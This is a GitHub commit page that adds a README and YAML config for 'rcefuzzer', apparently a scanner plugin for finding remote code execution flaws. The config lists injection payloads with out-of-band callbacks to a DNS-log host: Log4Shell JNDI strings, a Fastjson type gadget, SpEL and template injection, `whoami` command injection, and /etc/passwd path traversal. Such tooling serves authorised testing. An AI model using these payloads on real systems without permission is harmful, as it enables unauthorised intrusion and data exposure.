-
Notifications
You must be signed in to change notification settings - Fork 10
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Loading branch information
1 parent
e6e085b
commit d9bb630
Showing
1 changed file
with
77 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,2 +1,79 @@ | ||
# rcefuzzer | ||
find your rce | ||
|
||
|
||
# 配置说明 | ||
|
||
``` | ||
### | ||
# | ||
# 配置说明: | ||
# 1.tweb的配置是必须要改的, 不改显示不了漏洞 | ||
# 2.白名单的优先级是高于黑名单的 | ||
# 3.所有配置都是可以动态改的, 不用重新加载插件 | ||
# 使用说明: | ||
# https://www.wolai.com/gS5UWgMmHG4ynJQgzL3AYk | ||
### | ||
config: | ||
version: | # 插件版本 | ||
0.5 | ||
twebdomain: | # tweb 子域名配置 | ||
xxx.xx.com | ||
twebapi: | # tweb api配置 其中KEY为展位符,在新旧版本的tweb均可在Profile页面找到 | ||
https://admin.xxxx.com/logs?token=xxxxxx&type=dns&q=KEY | ||
timeout: | # 扫描过程中的超时配置 非tweb请求超时设置 单位毫秒 60000为60秒 | ||
60000 | ||
hostBlacklistReg: | # 禁止扫描的域名列表 | ||
(.+?)(gov\.cn|edu\.cn|tweb|google|gstatic)(.+?) | ||
extBlacklist: | # 禁止扫描的后缀列表,这不是正则,本来想从passive-scan-client中抄代码的,结果发现他有bug... | ||
.js|.css|.jpeg|.gif|.jpg|.png|.pdf|.rar|.zip|.docx|.doc|.ico | ||
jsonPollution: | ||
status: #on为开启 off为关闭 | ||
on | ||
allin: | #替换整个json数据包 | ||
{"@type":"java.net.Inet4Address","val":"dnslog"} | ||
value: | #仅污染json的键值 为了python eval那种情况考虑 不加双引号包裹的话污染结果类似{"test":__import__('os')} {"test":"{\"dtaa\":__import__('os')}"} | ||
"${jndi:ldap://dnslog/jsonkey}" | ||
__import__('socket').gethostbyaddr('dnslog') | ||
paramPollution: | ||
status: #on为开启 off为关闭 | ||
on | ||
exprs: | #为了兼容有回显的表达式注入/代码执行漏洞 | ||
{{9527*2333}}|22226491 | ||
${T(java.lang.System).getenv()}|JAVA_HOME | ||
${T+++++++(java.lang.System).getenv()}|JAVA_HOME | ||
{php}var_dump(md5(9527));{/php}|52569c045dc348f12dfc4c85000ad832 | ||
{if+var_dump(md5(9527))}{/if}|52569c045dc348f12dfc4c85000ad832 | ||
../../../../../../../../../../../../../../../etc/passwd|root | ||
value: | | ||
dnslog | ||
${jndi:ldap://paramPollution.dnslog/log4j} | ||
`whoami`.dnslog | ||
http://dnslog/ | ||
ping+-nc+1+dnslog | ||
headerPollution: | ||
status: #on为开启 off为关闭 | ||
on | ||
allin: | #一次性污染除了url和host外的所有请求头 | ||
${jndi:dns://dnslog/456} | ||
${jndi:ldap://dnslog/789} | ||
headers: | #添加的请求头如果原数据包有则追加原值污染 无则添加后再发包 竖线|为key和value的分隔符号。 | ||
X-Forwarded-For|${jndi:dns://dnslog/456} | ||
X-Api-Version|${jndi:dns://dnslog/456} | ||
ssrfPollution: | ||
status: #on为开启 off为关闭 | ||
on | ||
responseMatch: | ||
status: #on为开启 off为关闭 | ||
off | ||
expr: | #添加的请求头如果原数据包有则覆盖原值污染 无则添加后再发包 | ||
thinkphp:error | ||
``` |